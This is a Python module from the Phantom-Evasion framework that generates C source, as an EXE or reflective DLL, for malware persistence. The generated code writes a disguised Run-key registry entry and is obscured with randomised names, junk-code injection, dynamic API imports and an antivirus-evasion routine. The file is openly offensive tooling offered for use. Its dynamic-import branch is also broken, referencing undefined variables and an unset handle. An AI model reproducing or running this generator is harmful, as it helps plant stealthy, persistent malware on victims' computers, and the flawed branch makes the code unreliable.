
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys 
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
from usefull import WindowsDecoyProc
from usefull import CloseDecoyProc
from usefull import WriteSource
 
def Persistence_C_REG_windows(ModOpt):

    FilePath = ModOpt["Binpath"]
    FakeAppname = ModOpt["Pname"]
    Elevated = ModOpt["Priv"]

    Randvarpath = varname_creator()
    Randvarpath2 = varname_creator()
    RandHKey = varname_creator()
    RandHKey2 = varname_creator()
    RandLResult = varname_creator()
    RandLResult2 = varname_creator()
    Randhandle = varname_creator()
    RandSZvalue = varname_creator()
    RandFSuccess = varname_creator()
    RandFSuccess2 = varname_creator()
    RandDWsize = varname_creator()
    RandDWsize2 = varname_creator()
    RandCount = varname_creator()
    RandRegtype = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"
        
        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"

        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"


    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(SpawnMultiProc)

    Ret_code += "$:EVA\n"

    Ret_code += "wchar_t " + Randvarpath + "[260];\n"
    Ret_code += "HMODULE " + Randhandle + " = LoadLibrary(TEXT(\"" + FilePath + "\"));\n"

    if ModOpt["DynImport"] == True:

        NdcGMFNW = varname_creator() 
        Ret_code += "FARPROC " + NdcGMFNW + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"GetModuleFileNameW\");\n"
        Ret_code += NdcGMFNW + "(" + Randlpv + "," + Randbufname + "," + ModOpt["Bufflen"] + ");\n"
    else:    
        Ret_code += "GetModuleFileNameW(" + Randhandle + ", " + Randvarpath + ", 260);\n"

    Ret_code += "HKEY " + RandHKey + " = NULL;LONG " + RandLResult + " = 0;BOOL " + RandFSuccess + " = TRUE;\n"
    Ret_code += "DWORD " + RandDWsize + ";const size_t " + RandCount + " = 260*2;\n"
    Ret_code += "wchar_t " + RandSZvalue + "[260*2] = {};\n"
    Ret_code += "wcscpy_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\"\");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", " + Randvarpath + ");\n"
    Ret_code += "wcscat_s(" + RandSZvalue + ", " + RandCount + ", L\"\\\" \");\n"


    if ModOpt["DynImport"] == True:

        NdcRCEKW = varname_creator() 
        Ret_code += "FARPROC " + NdcRCEKW + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ", \"RegCreateKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = " + NdcRCEKW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    else:  
        if Elevated == True:

            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"
        else:
            Ret_code += RandLResult + " = RegCreateKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, NULL, 0, (KEY_WRITE | KEY_READ), NULL, &" + RandHKey + ", NULL);\n"

    Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);\n"
    Ret_code += "if (" + RandFSuccess + "){\n"
    Ret_code += RandDWsize + " = (wcslen(" + RandSZvalue + ")+1)*2;\n"

    if ModOpt["DynImport"] == True:
        NdcRSKEW = varname_creator()
        NdcRCK = varname_creator()        
        Ret_code += "FARPROC " + NdcRSKEW + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ", \"RegSetValueExW\");\n"
        Ret_code += "FARPROC " + NdcRCK + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ", \"RegCloseKey\");\n"
        Ret_code += RandLResult + " = " + NdcRSKEW + "(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize+ ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){" + NdcRCK + "(" + RandHKey + ");" + RandHKey + " = NULL;}\n"
    else:

        Ret_code += RandLResult + " = RegSetValueExW(" + RandHKey + ",L\"" + FakeAppname + "\", 0, REG_SZ, (BYTE*)" + RandSZvalue + ", " + RandDWsize+ ");"
        Ret_code += RandFSuccess + " = (" + RandLResult + " == 0);}\n"
        Ret_code += "if (" + RandHKey + " != NULL){RegCloseKey(" + RandHKey + ");" + RandHKey + " = NULL;}\n"

    Ret_code += "HKEY " + RandHKey2 + " = NULL;LONG " + RandLResult2 + " = 0;BOOL " + RandFSuccess2 + " = TRUE;DWORD " + RandRegtype + " = REG_SZ;\n"
    Ret_code += "wchar_t " + Randvarpath2 + "[260]  = {};DWORD " + RandDWsize2 + " = sizeof(" + Randvarpath + ");\n"


    if ModOpt["DynImport"] == True:

        NdcOKEW = varname_creator()
              
        Ret_code += "FARPROC " + NdcOKEW + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ", \"RegOpenKeyExW\");\n"

        if Elevated == True:

            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = " + NdcOKEW + "(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    else:
        
        if Elevated == True:

            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"
        else:
            Ret_code += RandLResult2 + " = RegOpenKeyExW(HKEY_CURRENT_USER, L\"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, KEY_READ, &" + RandHKey2 + ");\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(SpawnMultiProc)

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)
